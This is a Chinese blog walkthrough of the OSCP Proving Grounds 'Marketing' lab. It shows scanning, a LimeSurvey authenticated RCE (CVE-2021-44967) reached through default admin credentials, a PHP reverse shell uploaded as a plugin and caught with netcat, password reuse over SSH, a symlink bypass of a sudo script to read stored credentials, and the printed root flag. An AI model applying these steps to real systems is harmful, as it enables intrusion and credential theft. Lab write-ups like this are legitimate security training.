柴郡猫^O^
柴郡猫^O^

OSCP - Proving Grounds - Marketing

主要知识点
  • 错误配置导致默认密码未被更改
  • 当你有一个密码的时候,尝试用它匹配尽可能多的用户,也许能遇到匹配的
具体步骤

执行nmap扫描,除了22/80端口开放以外,marketing.pg 也很有趣,毕竟在proving grounds里,这种pattern的字样都是需要加到 /etc/hosts里的

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-22 23:30 UTC
Nmap scan report for #remote_ip#
Host is up (0.00097s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)
|   256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
|_  256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: marketing.pg - Digital Marketing for you!
|_http-server-header: Apache/2.4.41 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=9/22%OT=22%CT=1%CU=41179%PV=Y%DS=2%DC=T%G=Y%TM=66F0
OS:A8B8%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=107%TI=Z%II=I%TS=A)OPS(O
OS:1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11N
OS:W7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R
OS:=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%
OS:RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%
OS:Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%I

使用nikto进一步扫描漏洞,发现一个/old路径值得进一步调查

- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          #remote_ip#
+ Target Hostname:    #remote_ip#
+ Target Port:        80
+ Start Time:         2024-09-22 23:31:06 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 476e, size: 5e3b006dc8299, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /old/: This might be interesting.
+ 8102 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2024-09-22 23:31:20 (GMT0) (14 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

访问http://#remote_ip# 和 http://#remote_ip#/old,发现两个页面几乎一样,仔细对比发现,后者多了一个Provided Platforms section,其中Surveys 功能下有一个link,指向 http://customers-survey.marketing.pg/

OSCP - Proving Grounds - Marketing_第1张图片

修改/etc/hosts文件,加入对应entry

#remote_ip# customers-survey.marketing.pg

访问http://customers-survey.marketing.pg/发现是一个LimeSurvey

OSCP - Proving Grounds - Marketing_第2张图片

搜索一下,发现一个authenticated RCE漏洞 [CVE-2021-44967] LimeSurvey RCE,继续调查发现LimeSurvey的默认用户名密码为admin/password, 登录成功后可以按照PoC的描述一步一步复现漏洞

将php-rev.php文件中的ip/port改为本地ip以及nc监听port后,使用zip命令打包

C:\home\kali\Documents\OFFSEC\GoToWork\Marketing\Limesurvey-RCE-main> zip Y1LD1R1M.zip config.xml php-rev.php
  adding: config.xml (deflated 56%)
  adding: php-rev.php (deflated 60%)

在LimeSurvey页面的 Configuration ->  Settings -> Plugins下上传 刚打包好的Y1LD1R1M.zip,并激活

OSCP - Proving Grounds - Marketing_第3张图片

在本地启动 nc -nlvp 9000后,访问 http://customers-survey.marketing.pg/upload/plugins/Y1LD1R1M/php-rev.php,得到reverse shell

C:\home\kali\Documents\OFFSEC\GoToWork\Marketing> nc -nlvp 9000
listening on [any] 9000 ...
connect to [#local_ip#] from (UNKNOWN) [#remote_ip#] 42080
Linux marketing 5.4.0-122-generic #138-Ubuntu SMP Wed Jun 22 15:00:31 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
 04:16:48 up  1:43,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whereis python
python: /usr/bin/python3.8 /usr/lib/python2.7 /usr/lib/python3.9 /usr/lib/python3.8 /etc/python3.8 /usr/local/lib/python3.8
/usr/$ bin/python3.8 -c 'import pty;pty.spawn("/bin/bash")'
www-data@marketing:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@marketing:/$

在/var/www/LimeSurvey/application/config/config.php中发现mysql 用户名/密码,但无法从mysql数据库中获得有用的线索

www-data@marketing:/var/www/LimeSurvey/application/config$ cat config.php
cat config.php
 array(
                'db' => array(
                        'connectionString' => 'mysql:host=localhost;port=3306;dbname=limesurvey;',
                        'emulatePrepare' => true,
                        'username' => 'limesurvey_user',
                        'password' => 'EzPwz2022_dev1$$23!!',
                        'charset' => 'utf8mb4',
                        'tablePrefix' => 'lime_',
                ),

在/home目录下发现两个用户,分别用m.sander和t.miller作为ssh用户名,EzPwz2022_dev1$$23!!作为密码后,t.miller成功登录

drwxr-xr-x 3 m.sander m.sander 4096 Jul 13  2022 m.sander
drwxr-xr-x 2 t.miller t.miller 4096 Jul 13  2022 t.miller

C:\home\kali\Documents\OFFSEC\GoToWork\Marketing> ssh t.miller@#remote_ip#    
^C
                                                                                                                                                                                                                                                                                
C:\home\kali\Documents\OFFSEC\GoToWork\Marketing> ssh t.miller@192.168.239.225
The authenticity of host #remote_ip# (#remote_ip#)' can't be established.
ED25519 key fingerprint is SHA256:bdEzYRpG4k3NkIr03/E2H6ltJRUD52Zi5YA0fkNr/nY.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:48: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '#remote_ip#' (ED25519) to the list of known hosts.
t.miller@#remote_ip#'s password: 
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue 24 Sep 2024 04:25:13 AM UTC

  System load:  0.0               Processes:               237
  Usage of /:   70.2% of 9.75GB   Users logged in:         0
  Memory usage: 36%               IPv4 address for ens160: 192.168.239.225
  Swap usage:   0%


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

t.miller@marketing:~$

执行sudo -l ,发现t.miller用户可以以 m.sander用户的名义执行 /usr/bin/sync.sh,而sync.sh的作用就是对比文件不同并copy

t.miller@marketing:~$ sudo -l
[sudo] password for t.miller: 

Sorry, try again.
[sudo] password for t.miller: 
Sorry, try again.
[sudo] password for t.miller: 
Matching Defaults entries for t.miller on marketing:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User t.miller may run the following commands on marketing:
    (m.sander) /usr/bin/sync.sh
t.miller@marketing:~$ cat /usr/bin/sync.sh
#! /bin/bash

if [ -z $1 ]; then
    echo "error: note missing"
    exit
fi

note=$1

if [[ "$note" =~ .*m.sander.* ]]; then
    echo "error: forbidden"
    exit
fi

difference=$(diff /home/m.sander/personal/notes.txt $note)

if [[ -z $difference ]]; then
    echo "no update"
    exit
fi

echo "Difference: $difference"

cp $note /home/m.sander/personal/notes.txt

echo "[+] Updated."

在这里兜了很大的圈子,无法找到有用的信息,但发现t.miller和m.sander都属于mlocate group,mlocate用于检索文件,查找mlocate.db文件并查找m.sander相关的文件,发现 /home/m.sander/personal/creds-for-2022.txt

t.miller@marketing:~$ find / -type f -name mlocate.db 2>/dev/null
/var/lib/mlocate/mlocate.db

为了规避sync.sh中下面的逻辑,在/home/t.miller/ 目录中利用ln -sf 创建软连接, ln -sf /home/m.sander/personal/creds-for-2022.txt text

if [[ "$note" =~ .*m.sander.* ]]; then
    echo "error: forbidden"
    exit
fi

后执行sync.sh命令得到一组密码

t.miller@marketing:~$ ln -sf /home/m.sander/personal/creds-for-2022.txt text
t.miller@marketing:~$ ls -l
total 4
-rw------- 1 t.miller t.miller 33 Sep 24 02:35 local.txt
lrwxrwxrwx 1 t.miller t.miller 42 Sep 24 04:49 text -> /home/m.sander/personal/creds-for-2022.txt
t.miller@marketing:~$ sudo -u m.sander /usr/bin/sync.sh text
[sudo] password for t.miller: 
Difference: 1,3c1,8
< == NOTES ==
< - remove vhost from website (done)
< - update to newer version (todo)
\ No newline at end of file
---
> slack account:
> michael_sander@gmail.com - pa$$word@123$$4!!
> 
> github:
> michael_sander@gmail.com - EzPwz2022_dev1$$23!!
> 
> gmail:
> michael_sander@gmail.com - EzPwz2022_12345678#!
\ No newline at end of file
[+] Updated.
t.miller@marketing:~$

用m.sander作为用户名,分别用三个密码来尝试su m.sander,最后一个是正确的密码,且m.sander有sudo ALL的权限。

m.sander@marketing:/home/t.miller$ sudo -l
[sudo] password for m.sander: 
Matching Defaults entries for m.sander on marketing:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User m.sander may run the following commands on marketing:
    (ALL : ALL) ALL
m.sander@marketing:/home/t.miller$ sudo cat /root/proof.txt
ed25b0f57e3a723a6887dd34b6eff902
m.sander@marketing:/home/t.miller$

你可能感兴趣的:(OSCP,网络安全,安全性测试)

  • 基于USB Key的Web系统双因素认证解决方案:构建安全与便捷的登录体系 安 当 加 密 安全网络运维
    摘要在网络安全威胁日益严峻的背景下,传统的“用户名+密码”认证方式已难以应对钓鱼攻击、密码窃取等风险。上海安当基于USBKey技术,推出了一套面向Web系统的双因素认证解决方案,通过硬件与密码学的深度融合,实现用户身份的高强度验证。本文将从技术原理、实现流程、核心优势及典型应用场景等角度,详细解析该方案的设计与实践。一、技术原理与核心组件1.USBKey的双因素认证机制USBKey作为硬件载体,结
  • 《基于机器学习的DDoS攻击检测与防御系统设计与实现》开题报告 大数据蟒行探索者 毕业论文/研究报告机器学习ddos人工智能安全网络web安全
    目录一、课题的研究目的和意义1.1课题背景1.2课题目的(1)提高DDoS攻击检测的准确性(2)加强DDoS攻击的防御能力(3)提升网络安全防护的技术水平1.3课题意义(1)理论意义(2)实践意义二、国内(外)研究现状及分析2.1国内研究现状2.2国外研究现状2.3总结回顾三、课题主要研究内容及可行性分析3.1课题主要内容3.2可行性分析(1)技术成熟度与应用前景(2)数据处理能力四、研究方案和技
  • NFT热潮下的安全隐患:SSL证书如何守护数字资产? ssl证书
    NFT热潮下的安全隐患:SSL证书如何守护数字资产?近年来,NFT(非同质化代币)以其独特性和稀缺性迅速走红,成为数字艺术、游戏、收藏品等领域的热门话题。然而,随着NFT市场的火爆,安全问题也日益凸显:黑客攻击、钓鱼网站、数据泄露等事件频发,给数字资产的安全带来了巨大威胁。在这样的背景下,SSL证书作为网络安全的基础设施,正在为NFT平台和用户提供关键的安全保障。1.NFT热潮背后的安全隐患·黑客
  • 实人认证 人像三要素API:构建安全可信的数字身份验证 api
    引言在数字化浪潮席卷全球的今天,网络身份认证已成为保障网络安全、维护用户权益的关键环节。传统的用户名密码认证方式存在着易泄露、易盗用等安全隐患,难以满足日益增长的安全需求。实人认证,作为一种更加安全可靠的身份验证方式,正逐渐成为主流。而人像三要素API,作为实人认证的核心技术之一,凭借其高效、精准的优势,在金融、政务、电商等领域得到广泛应用。人像三要素API简介人像三要素API,是指输入姓名、身份
  • AI浪潮下的数据保卫战:SSL证书为何成为企业刚需? ssl证书
    随着人工智能(AI)技术的迅猛发展,数据已成为企业最核心的资产之一。无论是训练AI模型、优化算法,还是提供个性化服务,数据的安全性和隐私保护都至关重要。然而,AI的广泛应用也带来了前所未有的安全挑战,尤其是在数据传输和存储过程中,如何防止数据泄露、篡改和窃取成为企业必须面对的问题。在这样的背景下,SSL证书作为网络安全的基础设施,正逐渐成为企业的“刚需”。1.AI时代的数据安全挑战数据量激增:AI
  • “面面俱到”!人脸活体检测让应用告别假面攻击 harmonyos
    随着人脸识别技术在金融、医疗等多个领域的加速落地,网络安全、信息泄露等问题愈为突出,用户对应用稳定性和安全性的要求也更为严格。HarmonyOSSDK场景化视觉服务(VisionKit)提供人脸动作活体检测能力,增强对于非活体攻击的防御能力和活体通过率。在投资理财、在线支付等高风险金融服务场景中,通过检测用户的组合动作等来验证用户为真实活体操作,抵御攻击,提高安全性,降低业务风险,全方位保障用户体
  • 元宇宙安全新纪元:SSL证书如何守护虚拟世界的隐私与信任? ssl证书
    **元宇宙安全新纪元:SSL证书如何守护虚拟世界的隐私与信任?元宇宙(Metaverse)作为虚拟与现实融合的新兴领域,正在吸引全球科技巨头和用户的关注。从虚拟社交、数字资产交易到沉浸式体验,元宇宙为用户提供了无限可能。然而,随着元宇宙的快速发展,安全问题也逐渐浮出水面:隐私泄露、数据篡改、身份盗窃等风险层出不穷。在这样的背景下,SSL证书作为网络安全的基础设施,正在为元宇宙的隐私与信任保驾护航。
  • 网络安全入门教程(非常详细)从零基础入门到精通,看完这一篇就够了 白帽黑客坤哥 web安全网络安全网络安全物联网
    href="https://csdnimg.cn/release/blogv2/dist/mdeditor/css/editerView/kdoc_html_views-1a98987dfd.css"rel="stylesheet"/>href="https://csdnimg.cn/release/blogv2/dist/mdeditor/css/editerView/ck_htmledit_v
  • 网络安全基石:构建安全数字世界的关键概念解析 清水白石008 pythonPython题库安全web安全php
    网络安全基石:构建安全数字世界的关键概念解析在当今互联互通的数字时代,网络安全已不再是可选项,而是构建可靠、可信赖数字世界的基石。从个人用户到大型企业,再到国家基础设施,我们都日益依赖网络,同时也面临着日益严峻的网络安全威胁。理解网络安全的基本概念,不仅是专业人士的必备技能,也是每个网络用户的基本素养。本文将深入浅出地解析网络安全的核心概念,助您构建坚固的网络安全防线,在数字世界中安全航行。1.网
  • 华为与思科路由器静态路由配置 wespten 网络协议栈网络设备5G物联网网络工具开发华为
    一、静态路由简介静态路由路由项(routingentry)由手动配置,而非动态决定。与动态路由不同,静态路由是固定的,不会改变,即使网络状况已经改变或是重新被组态。一般来说,静态路由是由网络管理员逐项加入路由表。优点:使用静态路由的另一个好处为网络安全保密性高。动态路由因为需要路由器之间频繁地交换各自的路由表,而对路由表的分析可以揭示网络的拓扑结构和网络地址等信息。因此,网络出于安全方面的考虑也可
  • 人生建议往死里学网络安全!零基础也能跨行学习!!漏洞挖掘还能做副业 黑客老哥 web安全学习安全网络系统安全
    一、网络安全的重要性:从‘不学会被黑’到‘学会保护别人’网络安全的概念现在不再是技术圈的独立话题,它已经渗透到社会的各个领域。从个人的隐私保护、企业的数据安全,到国家的信息防护,网络安全几乎影响了每一个人的生活。无论是黑客攻击、勒索病毒、数据泄露,还是国家间的信息战,网络安全已经成为现代社会的基础设施之一。所以,首先要明白学习网络安全的重要性:你不仅是在学习技术,更多的是在为自己和他人的安全“筑城
  • 基于深度学习的恶意软件检测系统:设计与实现 机器懒得学习 深度学习人工智能
    引言随着信息技术的飞速发展,恶意软件(如病毒、木马、勒索软件等)对全球网络安全构成了严重威胁。传统的恶意软件检测方法(如特征码匹配、行为分析等)在面对新型恶意软件变种时往往力不从心。近年来,深度学习技术在模式识别和分类任务中取得了显著成效,为恶意软件检测领域带来了新的机遇。本文将详细介绍一个基于深度学习的恶意软件检测系统的开发过程,该系统利用长短期记忆网络(LSTM)对Windows可执行程序的A
  • 信息安全基石:深入解析CIA三元组(机密性、完整性、可用性) 挣扎与觉醒中的技术人 网络安全入门及实战人工智能外包转型网络
    1.什么是CIA三元组?**CIA三元组(CIATriad)**是信息安全领域的核心模型,定义了信息保护的三大核心目标:Confidentiality(机密性)Integrity(完整性)Availability(可用性)该模型被广泛应用于网络安全架构设计、风险评估和合规性建设中(如ISO27001、GDPR等)。2.核心要素详解2.1机密性(Confidentiality)定义:确保信息仅被授权
  • 探秘 Netty 通信中的 SslHandler 类:保障网络通信安全的基石 小园子的小菜 netty安全web安全nettyjava
    引言在当今数字化时代,网络安全是每一个应用程序都必须重视的关键因素。尤其是在数据传输过程中,防止数据被窃取、篡改至关重要。Netty作为一个高性能的网络编程框架,为开发者提供了强大的功能来构建可靠的网络应用。其中,SslHandler类在保障数据传输安全方面扮演着核心角色,它使得Netty应用能够轻松实现SSL/TLS加密通信。本文将深入剖析Netty通信中的SslHandler类,探讨其工作原理
  • 云计算:虚拟化、容器化与云存储技术详解 Evaporator Core #深度学习网络工程师网络规划设计师云计算
    在上一篇中,我们深入探讨了网络安全的核心技术,包括加密、认证和防火墙,并通过实际案例和细节帮助读者全面理解这些技术的应用和重要性。今天,我们将转向一个近年来迅速发展的领域——云计算。云计算通过提供按需访问的计算资源,彻底改变了IT基础设施的构建和管理方式。本文将详细介绍云计算的核心技术,包括虚拟化、容器化和云存储,并通过实际案例和细节帮助读者全面理解这些技术的应用和优势。一、云计算概述1.1云计算
  • 网络安全正确错误行为 网络安全的误区不包括 Hacker_Nightrain web安全网络安全
    在网络安全形势与合规双重挑战下,制定网络安全策略成为企业计划的一个重要方面。但许多企业在制定安全策略时难免走入误区。接下来让我们盘点企业在制定网络安全策略中的10个误区。误区1:审计走过场进行全面的安全审计,却忽略了结果,像是“考完试”一样,过关了就放心了。企业口头禅:后面的工作会弥补差距,查漏补缺…误区2:部署安全工具,却无人管理部署许多优秀的安全产品,却只将其设置为自动模式,后期管理或维护却束
  • 技术领域,有许多优秀的博客和网站 小赖同学啊 Testmanger技术博客
    在技术领域,有许多优秀的博客和网站为开发者、工程师和技术爱好者提供了丰富的学习资源和行业动态。以下是一些常用的技术博客和网站,涵盖了编程、软件开发、数据科学、人工智能、网络安全等多个领域:1.综合技术博客1.1Medium网址:https://medium.com特点:Medium是一个开放的内容平台,许多技术专家和开发者在这里分享技术文章、教程和行业见解。你可以通过搜索特定技术主题找到相关内容。
  • 属于网络安全规划重安全性需求 黑客Jack web安全php安全
    点击文末小卡片,免费获取网络安全全套资料,资料在手,涨薪更快1.网络安全基本内容安全包括哪些方面操作系统内部的安全包括:数据存储安全、应用程序安全、操作系统安全。此外还有网络安全、物理安全、用户安全教育。网络安全:网络安全是指网络系统的硬件、软件及其系统中的数据受到保护,不因偶然的或者恶意的原因而遭受到破坏、更改、泄露,系统连续可靠正常地运行,网络服务不中断。网络安全由于不同的环境和应用而产生了不
  • [网络安全提高篇] 一二八.恶意软件分析之利用MS Defender实现恶意样本家族批量标注(含学术探讨) Eastmount 网络安全自学篇web安全恶意软件分析恶意样本家族标注MSDefender
    2024新的战场,继续奋斗。“网络安全提高班”新的100篇文章即将开启,包括Web渗透、内网渗透、靶场搭建、CVE复现、攻击溯源、实战及CTF总结,它将更加聚焦,更加深入,也是作者的慢慢成长史。换专业确实挺难的,Web渗透也是块硬骨头,但我也试试,看看自己未来四年究竟能将它学到什么程度,漫漫长征路,偏向虎山行。享受过程,一起加油~前文介绍了IDAPython配置过程和基础用法,然后尝试提取恶意软件
  • 网络安全工具汇总 Hacker_Fuchen web安全安全
    网络安全工具汇总漏洞及渗透练习平台WebGoat漏洞练习环境https://github.com/WebGoat/WebGoathttps://github.com/WebGoat/WebGoat-LegacyDamnVulnerableWebApplication(漏洞练习平台)https://github.com/RandomStorm/DVWA数据库注入练习平台https://github.
  • 网络安全 api 网络安全 ast技术 Hacker_LaoYi web安全githubgit
    随着应用或者API被攻击利用已经越来越多,虽然来自开源组件的漏洞加剧了这一现象的发生,但是,其实主要还是在于应用程序或者API本身没有做好防范,根源在于源代码本身的质量没有严格把控。AST是指ApplicationSecurityTesting,主要包括静态应用测试(SAST)、交互式应用测试(IAST)、动态应用测试(DAST)以及软件成分分析(SCA)等工具。应用测试工具AST是专门用于检测源
  • Java nmap 命令 网络安全(king) 网络安全黑客网络工程师网络web安全安全
    Java与Nmap的结合:网络安全监测利器在现代网络环境中,安全性是至关重要的。尤其在企业和组织中,维护网络的安全性将直接影响到其运营的正常进行。Nmap(NetworkMapper)是一个开源的网络扫描工具,广泛应用于网络安全评估。今天,我们结合Java语言,探讨如何利用Java调用Nmap命令以实现网络安全监测的目的。什么是Nmap?Nmap是一个强大的网络扫描工具,可以用于发现网络上的设备、
  • Web网站漏洞扫描与渗透攻击 嗨起飞了 网络安全网络安全web安全
    Web网站漏洞扫描与渗透攻击工具全解析:从防御者到攻击者的双重视角网络安全是永无止境的攻防博弈前言:数字世界的攻守之道在数字化转型的浪潮中,Web应用已成为网络攻击的主要目标。根据CybersecurityVentures的统计,2023年全球因网络攻击导致的经济损失预计突破8万亿美元。作为开发者或安全工程师,了解常见漏洞扫描工具和渗透测试技术已成为必备技能。本文将从防御和攻击双重视角,深入剖析主
  • 黑客入门手册 嗨起飞了 网络安全网络攻击模型网络安全
    零基础入门网络安全:黑客技术学习路线与实战手册摘要:本文面向网络安全初学者,系统化拆解黑客技术学习路径,涵盖基础理论、实战工具和代码实例。内容遵循合法合规原则,仅用于技术研究。一、黑客技术学习的认知前提1.1什么是真正的"黑客"黑客精神的核心:探索系统原理与漏洞本质白帽/灰帽/黑帽的伦理边界(以《网络安全法》为准则)1.2学习前的法律警示渗透测试授权原则虚拟机实验环境搭建的重要性推荐工具:VMwa
  • 6G天地一体化信息网络内生安全技术 罗思付之技术屋 网络通信安全及科学技术专栏安全
    摘要:6G天地一体化信息网络面临因网络高度暴露、节点高速运动、计算资源受限等特点带来的安全挑战,且新架构、新应用、新技术也将引入新的安全问题,亟须提出普适性安全理论,一体化解决其功能安全及网络安全问题。为此,首先阐述网络空间内生安全主要理论基础,提出6G天地一体化信息网络内生安全架构;然后,在网络空间内生安全理论的指导下,从星载系统、6G地面移动网、星地链路探讨相关安全理论与技术构想;最后,从安全
  • 信息安全与网络安全的区别_信息安全与网络安全之差异探析 Hacker_Oldv web安全网络安全
    在当今数字化时代,信息安全与网络安全成为了人们关注的热点话题。尽管这两个概念经常被提及,但它们之间存在着明显的区别。本文旨在探讨信息安全与网络安全的定义、范畴及应对策略,以帮助读者更好地理解和应对相关挑战。一、定义与范畴的差异信息安全主要是指保护信息系统及其中的数据免受未经授权的访问、使用、泄露、破坏、修改或者销毁等威胁。它侧重于保护信息的机密性、完整性和可用性。信息安全不仅关注数据存储和传输过程
  • DeepSeek影响网络安全行业? 战神/calmness 安全项目管理安全信息安全人工智能
    DeepSeek的出现为网络安全行业带来了深远的影响,既创造了新的机遇,也提出了新的挑战。以下从技术、应用场景、行业生态以及风险管理四个方面进行详细分析:一、机遇提升安全防护能力-威胁检测与响应:DeepSeek可以通过分析海量日志、网络流量和行为数据,快速识别异常行为和潜在威胁,显著缩短安全事件检测和响应时间(MTTD和MTTR)。自动化防御:将DeepSeek整合到安全系统中,可以实现自动化威
  • DeepSeek安全:AI网络安全评估与防护策略 黑客Jack 安全web安全
    点击文末小卡片,免费获取网络安全全套资料,资料在手,涨薪更快本文基于现有的公开资料,从企业资深网络安全专家的视角,系统梳理DeepSeek技术在网络安全领域的潜在贡献与核心风险,并结合中国自主可控的发展战略,提出针对性的应对策略,旨在为相关企业和机构提供全面、深入的参考,以更好地应对人工智能时代的网络安全挑战。一、引言近年来,人工智能技术在全球范围内引发了深刻的科技变革与产业变革,而中国人工智能初
  • 隐私保护在 Facebook 内容审核系统中的应用 LokiSan 反侦测指纹浏览器社交媒体Facebookfacebook人工智能大数据ClonBrowser
    在这个信息爆炸的数字时代,社交媒体平台如Facebook已成为全球数十亿人日常生活中不可或缺的一部分。它们不仅提供了一个交流和分享的场所,也承担着维护网络环境健康、安全的重要责任。其中,内容审核系统是确保用户隐私和网络安全的重要工具。本文将探讨隐私保护在Facebook内容审核系统中的应用,并展望未来的发展方向。内容审核系统的重要性内容审核系统是社交媒体平台用来监控和过滤不当内容的机制。这些内容可
  • 网络安全等级保护测评 —— 主机安全详解:等保三级身份鉴别 哈尔滨伟祺科技 网络运维数据库
    在网络安全等级保护测评中,主机安全是极为关键的一环,而身份鉴别更是其中的核心要素之一,尤其对于等保三级要求,需要构建一套严谨且全面的身份鉴别体系。首先,在用户账号管理方面,必须确保所有用户都有唯一的标识,严禁共享账号的存在。对于新用户的创建,要有严格的审批流程,例如通过企业内部的自动化管理系统来实现。以下是一个简单的用户创建审批伪代码示例:defcreate_user(username,passw
  • eclipse maven IXHONG eclipse
    eclipse中使用maven插件的时候,运行run as maven build的时候报错 -Dmaven.multiModuleProjectDirectory system propery is not set. Check $M2_HOME environment variable and mvn script match.   可以设一个环境变量M2_HOME指
  • timer cancel方法的一个小实例 alleni123 多线程timer
    package com.lj.timer; import java.util.Date; import java.util.Timer; import java.util.TimerTask; public class MyTimer extends TimerTask { private int a; private Timer timer; pub
  • MySQL数据库在Linux下的安装 ducklsl mysql
    1.建好一个专门放置MySQL的目录 /mysql/db数据库目录 /mysql/data数据库数据文件目录 2.配置用户,添加专门的MySQL管理用户 >groupadd mysql ----添加用户组 >useradd -g mysql mysql ----在mysql用户组中添加一个mysql用户 3.配置,生成并安装MySQL >cmake -D
  • spring------>>cvc-elt.1: Cannot find the declaration of element Array_06 springbean
    将-------- <?xml version="1.0" encoding="UTF-8"?> <beans xmlns="http://www.springframework.org/schema/beans"     xmlns:xsi="http://www.w3
  • maven发布第三方jar的一些问题 cugfy maven
    maven中发布 第三方jar到nexus仓库使用的是 deploy:deploy-file命令 有许多参数,具体可查看 http://maven.apache.org/plugins/maven-deploy-plugin/deploy-file-mojo.html 以下是一个例子: mvn  deploy:deploy-file -DgroupId=xpp3
  • MYSQL下载及安装 357029540 mysql
        好久没有去安装过MYSQL,今天自己在安装完MYSQL过后用navicat for mysql去厕测试链接的时候出现了10061的问题,因为的的MYSQL是最新版本为5.6.24,所以下载的文件夹里没有my.ini文件,所以在网上找了很多方法还是没有找到怎么解决问题,最后看到了一篇百度经验里有这个的介绍,按照其步骤也完成了安装,在这里给大家分享下这个链接的地址
  • ios TableView cell的布局 张亚雄 tableview
      cell.imageView.image = [UIImage imageNamed:[imageArray objectAtIndex:[indexPath row]]];           CGSize itemSize = CGSizeMake(60, 50);   &nbs
  • Java编码转义 adminjun java编码转义
    import java.io.UnsupportedEncodingException; /** * 转换字符串的编码 */ public class ChangeCharset { /** 7位ASCII字符,也叫作ISO646-US、Unicode字符集的基本拉丁块 */ public static final Strin
  • Tomcat 配置和spring aijuans spring
    简介 Tomcat启动时,先找系统变量CATALINA_BASE,如果没有,则找CATALINA_HOME。然后找这个变量所指的目录下的conf文件夹,从中读取配置文件。最重要的配置文件:server.xml 。要配置tomcat,基本上了解server.xml,context.xml和web.xml。 Server.xml --  tomcat主
  • Java打印当前目录下的所有子目录和文件 ayaoxinchao 递归File
    其实这个没啥技术含量,大湿们不要操笑哦,只是做一个简单的记录,简单用了一下递归算法。   import java.io.File; /** * @author Perlin * @date 2014-6-30 */ public class PrintDirectory { public static void printDirectory(File f
  • linux安装mysql出现libs报冲突解决 BigBird2012 linux
    linux安装mysql出现libs报冲突解决 安装mysql出现 file /usr/share/mysql/ukrainian/errmsg.sys from install of MySQL-server-5.5.33-1.linux2.6.i386 conflicts with file from package mysql-libs-5.1.61-4.el6.i686  
  • jedis连接池使用实例 bijian1013 redisjedis连接池jedis
    实例代码: package com.bijian.study; import java.util.ArrayList; import java.util.List; import redis.clients.jedis.Jedis; import redis.clients.jedis.JedisPool; import redis.clients.jedis.JedisPoo
  • 关于朋友 bingyingao 朋友兴趣爱好维持
      成为朋友的必要条件:    志相同,道不合,可以成为朋友。譬如马云、周星驰一个是商人,一个是影星,可谓道不同,但都很有梦想,都要在各自领域里做到最好,当他们遇到一起,互相欣赏,可以畅谈两个小时。     志不同,道相合,也可以成为朋友。譬如有时候看到两个一个成绩很好每次考试争做第一,一个成绩很差的同学是好朋友。他们志向不相同,但他
  • 【Spark七十九】Spark RDD API一 bit1129 spark
    aggregate package spark.examples.rddapi import org.apache.spark.{SparkConf, SparkContext} //测试RDD的aggregate方法 object AggregateTest { def main(args: Array[String]) { val conf = new Spar
  • ktap 0.1 released bookjovi kerneltracing
    Dear, I'm pleased to announce that ktap release v0.1, this is the first official release of ktap project, it is expected that this release is not fully functional or very stable and we welcome bu
  • 能保存Properties文件注释的Properties工具类 BrokenDreams properties
